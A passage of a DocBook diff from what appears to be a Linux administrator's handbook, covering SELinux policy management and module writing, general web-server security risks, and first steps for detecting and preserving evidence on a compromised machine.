+system_u        user       SystemLow  SystemLow-SystemHigh  system_r
+test_u          staff      SystemLow  SystemLow             staff_r user_r
+unconfined_u    unconfined SystemLow  SystemLow-SystemHigh  system_r unconfined_r
+user_u          user       SystemLow  SystemLow             user_r
+# </computeroutput><userinput>semanage user -d test_u</userinput>
+</screen>
+      </section>
+      <section>
+        <title>Managing File Contexts, Ports and Booleans</title>
+
+	<para>Each SELinux module provides a set of file labeling rules,
+	but it is also possible to add custom labeling rules to cater to a
+	specific case. For example, if you want the web server to be able
+	to read files within the <filename>/srv/www/</filename> file
+	hierarchy, you could execute <command>semanage fcontext -a -t
+	httpd_sys_content_t "/srv/www(/.*)?"</command> followed by
+	<command>restorecon -R /srv/www/</command>. The former command
+	registers the new labeling rules and the latter resets the file
+	types according to the current labeling rules.</para>
+
+	<para>Similarly, TCP/UDP ports are labeled in a way that ensures
+	that only the corresponding daemons can listen to them. For
+	instance, if you want the web server to be able to listen on port
+	8080, you should run <command>semanage port -m -t http_port_t -p
+	tcp 8080</command>.</para>
+
+	<para>Some SELinux modules export boolean options that you can
+	tweak to alter the behavior of the default rules. The
+	<command>getsebool</command> utility can be used to inspect those
+	options (<command>getsebool
+	<replaceable>boolean</replaceable></command> displays one option,
+	and <command>getsebool -a</command> them all). The
+	<command>setsebool <replaceable>boolean</replaceable>
+	<replaceable>value</replaceable></command> command changes the
+	current value of a boolean option. The <literal>-P</literal> option
+	makes the change permanent, it means that the new value becomes the
+	default and will be kept across reboots. The example below grants
+	web servers an access to home directories (this is useful when
+	users have personal websites in
+	<filename>~/public_html/</filename>).</para>
+
+        <screen><computeroutput># </computeroutput><userinput>getsebool httpd_enable_homedirs</userinput>
+<computeroutput>httpd_enable_homedirs --&gt; off
+# </computeroutput><userinput>setsebool -P httpd_enable_homedirs on</userinput>
+<computeroutput># </computeroutput><userinput>getsebool httpd_enable_homedirs</userinput> 
+<computeroutput>httpd_enable_homedirs --&gt; on</computeroutput>
+</screen>
+      </section>
+    </section>
+    <section id="sect.selinux-custom-rules">
+      <title>Adapting the Rules</title>
+
+      <para>Since the SELinux policy is modular, it might be interesting to
+      develop new modules for (possibly custom) applications that lack
+      them. These new modules will then complete the <emphasis>reference
+      policy</emphasis>.</para>
+
+      <para>To create new modules, the <emphasis role="pkg">selinux-policy-dev</emphasis> package is required, as well
+      as <emphasis role="pkg">selinux-policy-doc</emphasis>. The latter
+      contains the documentation of the standard rules
+      (<filename>/usr/share/doc/selinux-policy-doc/html/</filename>) and
+      sample files that can be used as templates to create new modules.
+      Install those files and study them more closely:</para>
+
+      <screen><computeroutput>$ </computeroutput><userinput>cp /usr/share/doc/selinux-policy-doc/Makefile.example Makefile</userinput>
+<computeroutput>$ </computeroutput><userinput>cp /usr/share/doc/selinux-policy-doc/example.fc ./</userinput>
+<computeroutput>$ </computeroutput><userinput>cp /usr/share/doc/selinux-policy-doc/example.if ./</userinput>
+<computeroutput>$ </computeroutput><userinput>cp /usr/share/doc/selinux-policy-doc/example.te ./</userinput>
+</screen>
+
+      <para>The <filename>.te</filename> file is the most important one. It
+      defines the rules. The <filename>.fc</filename> file defines the
+      “file contexts”, that is the types assigned to files related to
+      this module. The data within the <filename>.fc</filename> file are
+      used during the file labeling step. Finally, the
+      <filename>.if</filename> file defines the interface of the module:
+      it is a set of “public functions” that other modules can use to
+      properly interact with the module that you're creating.</para>
+      <section>
+        <title>Writing a <filename>.fc</filename> file</title>
+
+	<para>Reading the below example should be sufficient to understand
+	the structure of such a file. You can use regular expressions to
+	assign the same security context to multiple files, or even an
+	entire directory tree.</para>
+
+        <example>
+          <title><filename>example.fc</filename> file</title>
+
+          <programlisting role="scale"># myapp executable will have:
+# label: system_u:object_r:myapp_exec_t
+# MLS sensitivity: s0
+# MCS categories: &lt;none&gt;
+
+/usr/sbin/myapp         --      gen_context(system_u:object_r:myapp_exec_t,s0)
+</programlisting>
+        </example>
+      </section>
+      <section>
+        <title>Writing a <filename>.if</filename> File</title>
+
+	<para>In the sample below, the first interface
+	(“<literal>myapp_domtrans</literal>”) controls who can execute
+	the application. The second one
+	(“<literal>myapp_read_log</literal>”) grants read rights on the
+	application's log files.</para>
+
+	<para>Each interface must generate a valid set of rules which can
+	be embedded in a <filename>.te</filename> file. You should thus
+	declare all the types that you use (with the
+	<literal>gen_require</literal> macro), and use standard directives
+	to grant rights. Note, however, that you can use interfaces
+	provided by other modules. The next section will give more
+	explanations about how to express those rights.</para>
+
+        <example>
+          <title><filename>example.if</filename> File</title>
+
+          <programlisting>## &lt;summary&gt;Myapp example policy&lt;/summary&gt;
+## &lt;desc&gt;
+##      &lt;p&gt;
+##              More descriptive text about myapp.  The &lt;desc&gt;
+##              tag can also use &lt;p&gt;, &lt;ul&gt;, and &lt;ol&gt;
+##              html tags for formatting.
+##      &lt;/p&gt;
+##      &lt;p&gt;
+##              This policy supports the following myapp features:
+##              &lt;ul&gt;
+##              &lt;li&gt;Feature A&lt;/li&gt;
+##              &lt;li&gt;Feature B&lt;/li&gt;
+##              &lt;li&gt;Feature C&lt;/li&gt;
+##              &lt;/ul&gt;
+##      &lt;/p&gt;
+## &lt;/desc&gt;
+#
+
+########################################
+## &lt;summary&gt;
+##      Execute a domain transition to run myapp.
+## &lt;/summary&gt;
+## &lt;param name="domain"&gt;
+##      Domain allowed to transition.
+## &lt;/param&gt;
+#
+interface(`myapp_domtrans',`
+        gen_require(`
+                type myapp_t, myapp_exec_t;
+        ')
+
+        domtrans_pattern($1,myapp_exec_t,myapp_t)
+')
+
+########################################
+## &lt;summary&gt;
+##      Read myapp log files.
+## &lt;/summary&gt;
+## &lt;param name="domain"&gt;
+##      Domain allowed to read the log files.
+## &lt;/param&gt;
+#
+interface(`myapp_read_log',`
+        gen_require(`
+                type myapp_log_t;
+        ')
+
+        logging_search_logs($1)
+        allow $1 myapp_log_t:file r_file_perms;
+')
+</programlisting>
+        </example>
+
+        <sidebar>
+          <title><emphasis>DOCUMENTATION</emphasis> Explanations about the <emphasis>reference policy</emphasis></title>
+
+	  <para>The <emphasis>reference policy</emphasis> evolves like any
+	  free software project: based on volunteer contributions. The
+	  project is hosted by Tresys, one of the most active companies in
+	  the SELinux field. Their wiki contains explanations on how the
+	  rules are structured and how you can create new ones. <ulink type="block" url="https://github.com/TresysTechnology/refpolicy/wiki/GettingStarted" /></para>
+        </sidebar>
+      </section>
+      <section id="sect.writing-a-te-file">
+        <title>Writing a <filename>.te</filename> File</title>
+
+	<para>Have a look at the <filename>example.te</filename>
+	file:</para>
+
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> The <command>m4</command> macro language</title>
+
+	  <para>To properly structure the policy, the SELinux developers
+	  used a macro-command processor. Instead of duplicating many
+	  similar <emphasis>allow</emphasis> directives, they created
+	  “macro functions” to use a higher-level logic, which also
+	  results in a much more readable policy.</para>
+
+	  <para>In practice, <command>m4</command> is used to compile those
+	  rules. It does the opposite operation: it expands all those
+	  high-level directives into a huge database of
+	  <emphasis>allow</emphasis> directives.</para>
+
+	  <para>The SELinux “interfaces” are only macro functions which
+	  will be substituted by a set of rules at compilation time.
+	  Likewise, some rights are in fact sets of rights which are
+	  replaced by their values at compilation time.</para>
+        </sidebar>
+
+        <programlisting>policy_module(myapp,1.0.0) <co id="example.te.module"></co>
+
+########################################
+#
+# Declarations
+#
+
+type myapp_t; <co id="example.te.type"></co>
+type myapp_exec_t;
+domain_type(myapp_t)
+domain_entry_file(myapp_t, myapp_exec_t) <co id="example.te.domain"></co>
+
+type myapp_log_t;
+logging_log_file(myapp_log_t) <co id="example.te.interface"></co>
+
+type myapp_tmp_t;
+files_tmp_file(myapp_tmp_t)
+
+########################################
+#
+# Myapp local policy
+#
+
+allow myapp_t myapp_log_t:file { read_file_perms append_file_perms }; <co id="example.te.allow"></co>
+
+allow myapp_t myapp_tmp_t:file manage_file_perms;
+files_tmp_filetrans(myapp_t,myapp_tmp_t,file)
+</programlisting>
+        <calloutlist>
+          <callout arearefs="example.te.module">
+	    <para>The module must be identified by its name and version
+	    number. This directive is required.</para>
+          </callout>
+          <callout arearefs="example.te.type">
+	    <para>If the module introduces new types, it must declare them
+	    with directives like this one. Do not hesitate to create as
+	    many types as required rather than granting too many useless
+	    rights.</para>
+          </callout>
+          <callout arearefs="example.te.domain">
+	    <para>Those interfaces define the <literal>myapp_t</literal>
+	    type as a process domain that should be used by any executable
+	    labeled with <literal>myapp_exec_t</literal>. Implicitly, this
+	    adds an <literal>exec_type</literal> attribute on those
+	    objects, which in turn allows other modules to grant rights to
+	    execute those programs: for instance, the
+	    <literal>userdomain</literal> module allows processes with
+	    domains <literal>user_t</literal>, <literal>staff_t</literal>,
+	    and <literal>sysadm_t</literal> to execute them. The domains of
+	    other confined applications will not have the rights to execute
+	    them, unless the rules grant them similar rights (this is the
+	    case, for example, of <command>dpkg</command> with its
+	    <literal>dpkg_t</literal> domain).</para>
+          </callout>
+          <callout arearefs="example.te.interface">
+	    <para><literal>logging_log_file</literal> is an interface
+	    provided by the reference policy. It indicates that files
+	    labeled with the given type are log files which ought to
+	    benefit from the associated rules (for example granting rights
+	    to <command>logrotate</command> so that it can manipulate
+	    them).</para>
+          </callout>
+          <callout arearefs="example.te.allow">
+	    <para>The <literal>allow</literal> directive is the base
+	    directive used to authorize an operation. The first parameter
+	    is the process domain which is allowed to execute the
+	    operation. The second one defines the object that a process of
+	    the former domain can manipulate. This parameter is of the form
+	    “<replaceable>type</replaceable>:<replaceable>class</replaceable>“
+	    where <replaceable>type</replaceable> is its SELinux type and
+	    <replaceable>class</replaceable> describes the nature of the
+	    object (file, directory, socket, fifo, etc.). Finally, the last
+	    parameter describes the permissions (the allowed
+	    operations).</para>
+
+	    <para>Permissions are defined as the set of allowed operations
+	    and follow this template: <literal>{
+	    <replaceable>operation1</replaceable>
+	    <replaceable>operation2</replaceable> }</literal>. However, you
+	    can also use macros representing the most useful permissions.
+	    The
+	    <filename>/usr/share/selinux/devel/include/support/obj_perm_sets.spt</filename>
+	    lists them.</para>
+
+	    <para>The following web page provides a relatively exhaustive
+	    list of object classes, and permissions that can be granted.
+	    <ulink type="block" url="http://www.selinuxproject.org/page/ObjectClassesPerms" /></para>
+          </callout>
+        </calloutlist>
+
+	<para>Now you just have to find the minimal set of rules required
+	to ensure that the target application or service works properly. To
+	achieve this, you should have a good knowledge of how the
+	application works and of what kind of data it manages and/or
+	generates.</para>
+
+	<para>However, an empirical approach is possible. Once the
+	relevant objects are correctly labeled, you can use the
+	application in permissive mode: the operations that would be
+	forbidden are logged but still succeed. By analyzing the logs, you
+	can now identify the operations to allow. Here is an example of
+	such a log entry:</para>
+
+        <programlisting>avc:  denied  { read write } for  pid=1876 comm="syslogd" name="xconsole" dev=tmpfs ino=5510 scontext=system_u:system_r:syslogd_t:s0 tcontext=system_u:object_r:device_t:s0 tclass=fifo_file permissive=1
+</programlisting>
+
+	<para>To better understand this message, let us study it piece by
+	piece.</para>
+
+        <table colsep="1">
+          <title>Analysis of an SELinux trace</title>
+          <tgroup cols="2">
+            <thead>
+              <row>
+                <entry>Message</entry>
+                <entry>Description</entry>
+              </row>
+            </thead>
+            <tbody>
+              <row>
+                <entry>
+                  <computeroutput>avc: denied</computeroutput>
+                </entry>
+                <entry>An operation has been denied.</entry>
+              </row>
+              <row>
+                <entry>
+                  <computeroutput>{ read write }</computeroutput>
+                </entry>
+                <entry>This operation required the <literal>read</literal> and <literal>write</literal> permissions.</entry>
+              </row>
+              <row>
+                <entry>
+                  <computeroutput>pid=1876</computeroutput>
+                </entry>
+                <entry>The process with PID 1876 executed the operation (or tried to execute it).</entry>
+              </row>
+              <row>
+                <entry>
+                  <computeroutput>comm="syslogd"</computeroutput>
+                </entry>
+                <entry>The process was an instance of the <literal>syslogd</literal> program.</entry>
+              </row>
+              <row>
+                <entry>
+                  <computeroutput>name="xconsole"</computeroutput>
+                </entry>
+                <entry>The target object was named <literal>xconsole</literal>. Sometimes you can also have a “path” variable — with the full path — instead.</entry>
+              </row>
+              <row>
+                <entry>
+                  <computeroutput>dev=tmpfs</computeroutput>
+                </entry>
+                <entry>The device hosting the target object is a <literal>tmpfs</literal> (an in-memory filesystem). For a real disk, you could see the partition hosting the object (for example: “sda3”).</entry>
+              </row>
+              <row>
+                <entry>
+                  <computeroutput>ino=5510</computeroutput>
+                </entry>
+                <entry>The object is identified by the inode number 5510.</entry>
+              </row>
+              <row>
+                <entry>
+                  <computeroutput>scontext=system_u:system_r:syslogd_t:s0</computeroutput>
+                </entry>
+                <entry>This is the security context of the process who executed the operation.</entry>
+              </row>
+              <row>
+                <entry>
+                  <computeroutput>tcontext=system_u:object_r:device_t:s0</computeroutput>
+                </entry>
+                <entry>This is the security context of the target object.</entry>
+              </row>
+              <row>
+                <entry>
+                  <computeroutput>tclass=fifo_file</computeroutput>
+                </entry>
+                <entry>The target object is a FIFO file.</entry>
+              </row>
+            </tbody>
+          </tgroup>
+        </table>
+
+	<para>By observing this log entry, it is possible to build a rule
+	that would allow this operation. For example: <literal>allow
+	syslogd_t device_t:fifo_file { read write }</literal>. This process
+	can be automated, and it's exactly what the
+	<command>audit2allow</command> command (of the <emphasis role="pkg">policycoreutils</emphasis> package) offers. This
+	approach is only useful if the various objects are already
+	correctly labeled according to what must be confined. In any case,
+	you will have to carefully review the generated rules and validate
+	them according to your knowledge of the application. Effectively,
+	this approach tends to grant more rights than are really required.
+	The proper solution is often to create new types and to grant
+	rights on those types only. It also happens that a denied operation
+	isn't fatal to the application, in which case it might be better to
+	just add a “<literal>dontaudit</literal>” rule to avoid the log
+	entry despite the effective denial.</para>
+
+        <sidebar>
+          <title><emphasis>COMPLEMENTS</emphasis> No roles in policy rules</title>
+          <indexterm><primary>Type Enforcement</primary></indexterm>
+          <indexterm><primary>Enforcement, Type Enforcement</primary></indexterm>
+
+	  <para>It might seem weird that roles do not appear at all when
+	  creating new rules. SELinux uses only the domains to find out
+	  which operations are allowed. The role intervenes only indirectly
+	  by allowing the user to switch to another domain. SELinux is
+	  based on a theory known as <emphasis>Type Enforcement</emphasis>
+	  and the type is the only element that matters when granting
+	  rights.</para>
+        </sidebar>
+      </section>
+      <section>
+        <title>Compiling the Files</title>
+
+	<para>Once the 3 files (<filename>example.if</filename>,
+	<filename>example.fc</filename>, and
+	<filename>example.te</filename>) match your expectations for the
+	new rules, just run <command>make NAME=devel</command> to generate a module in
+	the <filename>example.pp</filename> file (you can immediately load
+	it with <command>semodule -i example.pp</command>). If several
+	modules are defined, <command>make</command> will create all the
+	corresponding <filename>.pp</filename> files.</para>
+      </section>
+    </section>
+  </section>
+  <section id="sect.other-security-considerations">
+    <title>Other Security-Related Considerations</title>
+
+    <para>Security is not just a technical problem; more than anything,
+    it is about good practices and understanding the risks. This section
+    reviews some of the more common risks, as well as a few best practices
+    which should, depending on the case, increase security or lessen the
+    impact of a successful attack.</para>
+    <section>
+      <title>Inherent Risks of Web Applications</title>
+
+      <para>The universal character of web applications led to their
+      proliferation. Several are often run in parallel: a webmail, a wiki,
+      some groupware system, forums, a photo gallery, a blog, and so on.
+      Many of those applications rely on the “LAMP” (<emphasis>Linux,
+      Apache, MySQL, PHP</emphasis>) stack. Unfortunately, many of those
+      applications were also written without much consideration for
+      security problems. Data coming from outside is, too often, used with
+      little or no validation. Providing specially-crafted values can be
+      used to subvert a call to a command so that another one is executed
+      instead. Many of the most obvious problems have been fixed as time
+      has passed, but new security problems pop up regularly.</para>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> SQL injection</title>
+
+	<para>When a program inserts data into SQL queries in an insecure
+	manner, it becomes vulnerable to SQL injections; this name covers
+	the act of changing a parameter in such a way that the actual query
+	executed by the program is different from the intended one, either
+	to damage the database or to access data that should normally not
+	be accessible. <ulink type="block" url="http://en.wikipedia.org/wiki/SQL_Injection" /></para>
+        <indexterm><primary>SQL injection</primary></indexterm>
+      </sidebar>
+
+      <para>Updating web applications regularly is therefore a must, lest
+      any cracker (whether a professional attacker or a script kiddy) can
+      exploit a known vulnerability. The actual risk depends on the case,
+      and ranges from data destruction to arbitrary code execution,
+      including web site defacement.</para>
+    </section>
+    <section>
+      <title>Knowing What To Expect</title>
+
+      <para>A vulnerability in a web application is often used as a
+      starting point for cracking attempts. What follows is a short review
+      of possible consequences.</para>
+
+      <sidebar>
+        <title><emphasis>QUICK LOOK</emphasis> Filtering HTTP queries</title>
+
+	<para>Apache 2 includes modules allowing filtering incoming HTTP
+	queries. This allows blocking some attack vectors. For instance,
+	limiting the length of parameters can prevent buffer overflows.
+	More generally, one can validate parameters before they are even
+	passed to the web application and restrict access along many
+	criteria. This can even be combined with dynamic firewall updates,
+	so that a client infringing one of the rules is banned from
+	accessing the web server for a given period of time.</para>
+
+	<para>Setting up these checks can be a long and cumbersome task,
+	but it can pay off when the web application to be deployed has a
+	dubious track record where security is concerned.</para>
+
+	<para><emphasis>mod-security2</emphasis> (in the <emphasis role="pkg">libapache2-mod-security2</emphasis> package) is the main
+        such module. It even comes with many ready-to-use rules of its own
+        (in the <emphasis role="pkg">modsecurity-crs</emphasis> package)
+        that you can easily enable.</para>
+        <indexterm><primary><emphasis role="pkg">libapache-mod-security</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis>mod-security</emphasis></primary></indexterm>
+      </sidebar>
+
+      <para>The consequences of an intrusion will have various levels of
+      obviousness depending on the motivations of the attacker.
+      <emphasis>Script-kiddies</emphasis> only apply recipes they find on
+      web sites; most often, they deface a web page or delete data. In more
+      subtle cases, they add invisible contents to web pages so as to
+      improve referrals to their own sites in search engines.</para>
+
+      <para>A more advanced attacker will go beyond that. A disaster
+      scenario could go on in the following fashion: the attacker gains the
+      ability to execute commands as the <literal>www-data</literal> user,
+      but executing a command requires many manipulations. To make their
+      life easier, they install other web applications specially designed
+      to remotely execute many kinds of commands, such as browsing the
+      filesystem, examining permissions, uploading or downloading files,
+      executing commands, and even provide a network shell. Often, the
+      vulnerability will allow running a <command>wget</command> command
+      that will download some malware into <filename>/tmp/</filename>, then
+      executing it. The malware is often downloaded from a foreign website
+      that was previously compromised, in order to cover tracks and make it
+      harder to find out the actual origin of the attack.</para>
+
+      <para>At this point, the attacker has enough freedom of movement that
+      they often install an IRC <emphasis>bot</emphasis> (a robot that
+      connects to an IRC server and can be controlled by this channel).
+      This bot is often used to share illegal files (unauthorized copies of
+      movies or software, and so on). A determined attacker may want to go
+      even further. The <literal>www-data</literal> account does not allow
+      full access to the machine, and the attacker will try to obtain
+      administrator privileges. Now, this should not be possible, but if
+      the web application was not up-to-date, chances are that the kernel
+      and other programs are outdated too; this sometimes follows a
+      decision from the administrator who, despite knowing about the
+      vulnerability, neglected to upgrade the system since there are no
+      local users. The attacker can then take advantage of this second
+      vulnerability to get root access.</para>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> Privilege escalation</title>
+
+	<para>This term covers anything that can be used to obtain more
+	permissions than a given user should normally have. The
+	<command>sudo</command> program is designed for precisely the
+	purpose of giving administrative rights to some users. But the same
+	term is also used to describe the act of an attacker exploiting a
+	vulnerability to obtain undue rights.</para>
+      </sidebar>
+
+      <para>Now the attacker owns the machine; they will usually try to
+      keep this privileged access for as long as possible. This involves
+      installing a <emphasis>rootkit</emphasis>, a program that will
+      replace some components of the system so that the attacker will be
+      able to obtain the administrator privileges again at a later time;
+      the rootkit also tries hiding its own existence as well as any traces
+      of the intrusion. A subverted <command>ps</command> program will omit
+      to list some processes, <command>netstat</command> will not list some
+      of the active connections, and so on. Using the root permissions, the
+      attacker was able to observe the whole system, but didn't find
+      important data; so they will try accessing other machines in the
+      corporate network. Analyzing the administrator's account and the
+      history files, the attacker finds what machines are routinely
+      accessed. By replacing <command>sudo</command> or
+      <command>ssh</command> with a subverted program, the attacker can
+      intercept some of the administrator's passwords, which they will use
+      on the detected servers… and the intrusion can propagate from then
+      on.</para>
+
+      <para>This is a nightmare scenario which can be prevented by several
+      measures. The next few sections describe some of these
+      measures.</para>
+    </section>
+    <section id="sect.choosing-the-software-wisely">
+      <title>Choosing the Software Wisely</title>
+
+      <para>Once the potential security problems are known, they must be
+      taken into account at each step of the process of deploying a
+      service, especially when choosing the software to install. Many web
+      sites, such as <literal>SecurityFocus.com</literal>, keep a list of
+      recently-discovered vulnerabilities, which can give an idea of a
+      security track record before some particular software is deployed. Of
+      course, this information must be balanced against the popularity of
+      said software: a more widely-used program is a more tempting target,
+      and it will be more closely scrutinized as a consequence. On the
+      other hand, a niche program may be full of security holes that never
+      get publicized due to a lack of interest in a security audit.</para>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> Security audit</title>
+
+	<para>A security audit is the process of thoroughly reading and
+	analyzing the source code of some software, looking for potential
+	security vulnerabilities it could contain. Such audits are usually
+	proactive and they are conducted to ensure a program meets certain
+	security requirements.</para>
+      </sidebar>
+
+      <para>In the Free Software world, there is generally ample room for
+      choice, and choosing one piece of software over another should be a
+      decision based on the criteria that apply locally. More features
+      imply an increased risk of a vulnerability hiding in the code; picking
+      the most advanced program for a task may actually be
+      counter-productive, and a better approach is usually to pick the
+      simplest program that meets the requirements.</para>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> Zero-day exploit</title>
+
+	<para>A <emphasis>zero-day exploit</emphasis> attack is hard to
+	prevent; the term covers a vulnerability that is not yet known to
+	the authors of the program.</para>
+      </sidebar>
+    </section>
+    <section id="sect.managing-a-machine-as-a-whole">
+      <title>Managing a Machine as a Whole</title>
+
+      <para>Most Linux distributions install by default a number of Unix
+      services and many tools. In many cases, these services and tools are
+      not required for the actual purposes for which the administrator set
+      up the machine. As a general guideline in security matters, unneeded
+      software is best uninstalled. Indeed, there is no point in securing an
+      FTP server, if a vulnerability in a different, unused service can be
+      used to get administrator privileges on the whole machine.</para>
+
+      <para>By the same reasoning, firewalls will often be configured to
+      only allow access to services that are meant to be publicly
+      accessible.</para>
+
+      <para>Current computers are powerful enough to allow hosting several
+      services on the same physical machine. From an economic viewpoint,
+      such a possibility is interesting: only one computer to administrate,
+      lower energy consumption, and so on. From the security point of view,
+      however, such a choice can be a problem. One compromised service can
+      bring access to the whole machine, which in turn compromises the
+      other services hosted on the same computer. This risk can be
+      mitigated by isolating the services. This can be attained either with
+      virtualization (each service being hosted in a dedicated virtual
+      machine or container), or with AppArmor/SELinux (each service daemon
+      having an adequately designed set of permissions).</para>
+    </section>
+    <section id="sect.users-are-players">
+      <title>Users Are Players</title>
+
+      <para>Discussing security immediately brings to mind protection
+      against attacks by anonymous crackers hiding in the Internet jungle;
+      but an often-forgotten fact is that risks also come from inside: an
+      employee about to leave the company could download sensitive files on
+      the important projects and sell them to competitors, a negligent
+      salesman could leave their desk without locking their session during
+      a meeting with a new prospect, a clumsy user could delete the wrong
+      directory by mistake, and so on.</para>
+
+      <para>The response to these risks can involve technical solutions: no
+      more than the required permissions should be granted to users, and
+      regular backups are a must. But in many cases, the appropriate
+      protection is going to involve training users to avoid the
+      risks.</para>
+
+      <sidebar>
+        <title><emphasis>QUICK LOOK</emphasis> <emphasis role="pkg">autolog</emphasis></title>
+
+	<para>The <emphasis role="pkg">autolog</emphasis> package provides
+	a program that automatically disconnects inactive users after a
+	configurable delay. It also allows killing user processes that
+	persist after a session ends, thereby preventing users from running
+	daemons.</para>
+      </sidebar>
+    </section>
+    <section id="sect.physical-security">
+      <title>Physical Security</title>
+
+      <para>There is no point in securing the services and networks if the
+      computers themselves are not protected. Important data deserve being
+      stored on hot-swappable hard disks in RAID arrays, because hard disks
+      fail eventually and data availability is a must. But if any pizza
+      delivery boy can enter the building, sneak into the server room and
+      run away with a few selected hard disks, an important part of
+      security is not fulfilled. Who can enter the server room? Is access
+      monitored? These questions deserve consideration (and an answer) when
+      physical security is being evaluated.</para>
+
+      <para>Physical security also includes taking into consideration the
+      risks for accidents such as fires. This particular risk is what
+      justifies storing the backup media in a separate building, or at
+      least in a fire-proof strongbox.</para>
+    </section>
+    <section>
+      <title>Legal Liability</title>
+
+      <para>An administrator is, more or less implicitly, trusted by their
+      users as well as the users of the network in general. They should
+      therefore avoid any negligence that malevolent people could
+      exploit.</para>
+
+      <para>An attacker taking control of your machine then using it as a
+      forward base (known as a “relay system”) from which to perform
+      other nefarious activities could cause legal trouble for you, since
+      the attacked party would initially see the attack coming from your
+      system, and therefore consider you as the attacker (or as an
+      accomplice). In many cases, the attacker will use your server as a
+      relay to send spam, which shouldn't have much impact (except
+      potentially registration on black lists that could restrict your
+      ability to send legitimate emails), but won't be pleasant
+      nevertheless. In other cases, more important trouble can be caused
+      from your machine, for instance denial of service attacks. This will
+      sometimes induce loss of revenue, since the legitimate services will
+      be unavailable and data can be destroyed; sometimes this will also
+      imply a real cost, because the attacked party can start legal
+      proceedings against you. Rights-holders can sue you if an
+      unauthorized copy of a work protected by copyright law is shared from
+      your server, as well as other companies compelled by service level
+      agreements if they are bound to pay penalties following the attack
+      from your machine.</para>
+
+      <para>When these situations occur, claiming innocence is not usually
+      enough; at the very least, you will need convincing evidence showing
+      suspect activity on your system coming from a given IP address. This
+      won't be possible if you neglect the recommendations of this chapter
+      and let the attacker obtain access to a privileged account (root, in
+      particular) and use it to cover their tracks.</para>
+    </section>
+  </section>
+  <section id="sect.dealing-with-compromised-machine">
+    <title>Dealing with a Compromised Machine</title>
+
+    <para>Despite the best intentions and however carefully designed the
+    security policy, an administrator eventually faces an act of hijacking.
+    This section provides a few guidelines on how to react when confronted
+    with these unfortunate circumstances.</para>
+    <section>
+      <title>Detecting and Seeing the Cracker's Intrusion</title>
+
+      <para>The first step of reacting to cracking is to be aware of such
+      an act. This is not self-evident, especially without an adequate
+      monitoring infrastructure.</para>
+
+      <para>Cracking acts are often not detected until they have direct
+      consequences on the legitimate services hosted on the machine, such
+      as connections slowing down, some users being unable to connect, or
+      any other kind of malfunction. Faced with these problems, the
+      administrator needs to have a good look at the machine and carefully
+      scrutinize what misbehaves. This is usually the time when they
+      discover an unusual process, for instance one named
+      <literal>apache</literal> instead of the standard
+      <literal>/usr/sbin/apache2</literal>. If we follow that example, the
+      thing to do is to note its process identifier, and check
+      <filename>/proc/<replaceable>pid</replaceable>/exe</filename> to see
+      what program this process is currently running:</para>
+
+      <screen>
+<computeroutput># </computeroutput><userinput>ls -al /proc/3719/exe</userinput>
+<computeroutput>lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -&gt; /var/tmp/.bash_httpd/psybnc</computeroutput>
+      </screen>
+
+      <para>A program installed under <filename>/var/tmp/</filename> and
+      running as the web server? No doubt left, the machine is
+      compromised.</para>
+
+      <para>This is only one example, but many other hints can ring the
+      administrator's bell:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>an option to a command that no longer works; the version of
+	  the software that the command claims to be doesn't match the
+	  version that is supposed to be installed according to
+	  <command>dpkg</command>;</para>
+        </listitem>
+        <listitem>
+	  <para>a command prompt or a session greeting indicating that the
+	  last connection came from an unknown server on another
+	  continent;</para>
+        </listitem>
+        <listitem>
+	  <para>errors caused by the <filename>/tmp/</filename> partition
+	  being full, which turned out to be full of illegal copies of
+	  movies;</para>
+        </listitem>
+        <listitem>
+	  <para>and so on.</para>
+        </listitem>
+      </itemizedlist>
+    </section>
+    <section>
+      <title>Putting the Server Off-Line</title>
+
+      <para>In any but the most exotic cases, the cracking comes from the
+      network, and the attacker needs a working network to reach their
+      targets (access confidential data, share illegal files, hide their
+      identity by using the machine as a relay, and so on). Unplugging the
+      computer from the network will prevent the attacker from reaching
+      these targets, if they haven't managed to do so yet.</para>
+
+      <para>This may only be possible if the server is physically
+      accessible. When the server is hosted in a hosting provider's data
+      center halfway across the country, or if the server is not accessible
+      for any other reason, it's usually a good idea to start by gathering
+      some important information (see <xref linkend="sect.keeping-everything-that-could-be-used-as-evidence" />,
+      <xref linkend="sect.forensic-analysis" /> and
+      <xref linkend="sect.reconstituting-the-attack-scenario" />), then isolating
+      that server as much as possible by shutting down as many services as
+      possible (usually, everything but <command>sshd</command>). This case
+      is still awkward, since one can't rule out the possibility of the
+      attacker having SSH access like the administrator has; this makes it
+      harder to “clean” the machines.</para>
+    </section>
+    <section id="sect.keeping-everything-that-could-be-used-as-evidence">
+      <title>Keeping Everything that Could Be Used as Evidence</title>
+
+      <para>Understanding the attack and/or engaging legal action against
+      the attackers requires taking copies of all the important elements;
+      this includes the contents of the hard disk, a list of all running
+      processes, and a list of all open connections. The contents of the
+      RAM could also be used, but it is rarely used in practice.</para>
+
+      <para>In the heat of action, administrators are often tempted to
+      perform many checks on the compromised machine; this is usually not a
+      good idea. Every command is potentially subverted and can erase
+      pieces of evidence. The checks should be restricted to the minimal
+      set (<command>netstat -tupan</command> for network connections,
+      <command>ps auxf</command> for a list of processes, <command>ls -alR
+      /proc/[0-9]*</command> for a little more information on running
+      programs), and every performed check should carefully be written
+      down.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Hot analysis</title>
+
+	<para>While it may seem tempting to analyze the system as it runs,
+	especially when the server is not physically reachable, this is
+	best avoided: quite simply you can't trust the programs currently
+	installed on the compromised system. It's quite possible for a
+	subverted <command>ps</command> command to hide some processes, or
+	for a subverted <command>ls</command> to hide files; sometimes even
+	the kernel is compromised!</para>
+
+	<para>If such a hot analysis is still required, care should be
+	taken to only use known-good programs. A good way to do that would
+	be to have a rescue CD with pristine programs, or a read-only
+	network share. However, even those countermeasures may not be
+	enough if the kernel itself is compromised.</para>
+      </sidebar>
+
+      <para>Once the “dynamic” elements have been saved, the next step
+      is to store a complete image of the hard-disk. Making such an image
+      is impossible if the filesystem is still evolving, which is why it
+      must be remounted read-only. The simplest solution is often to halt
+      the server brutally (after running <command>sync</command>) and
+      reboot it on a rescue CD. Each partition should be copied with a tool
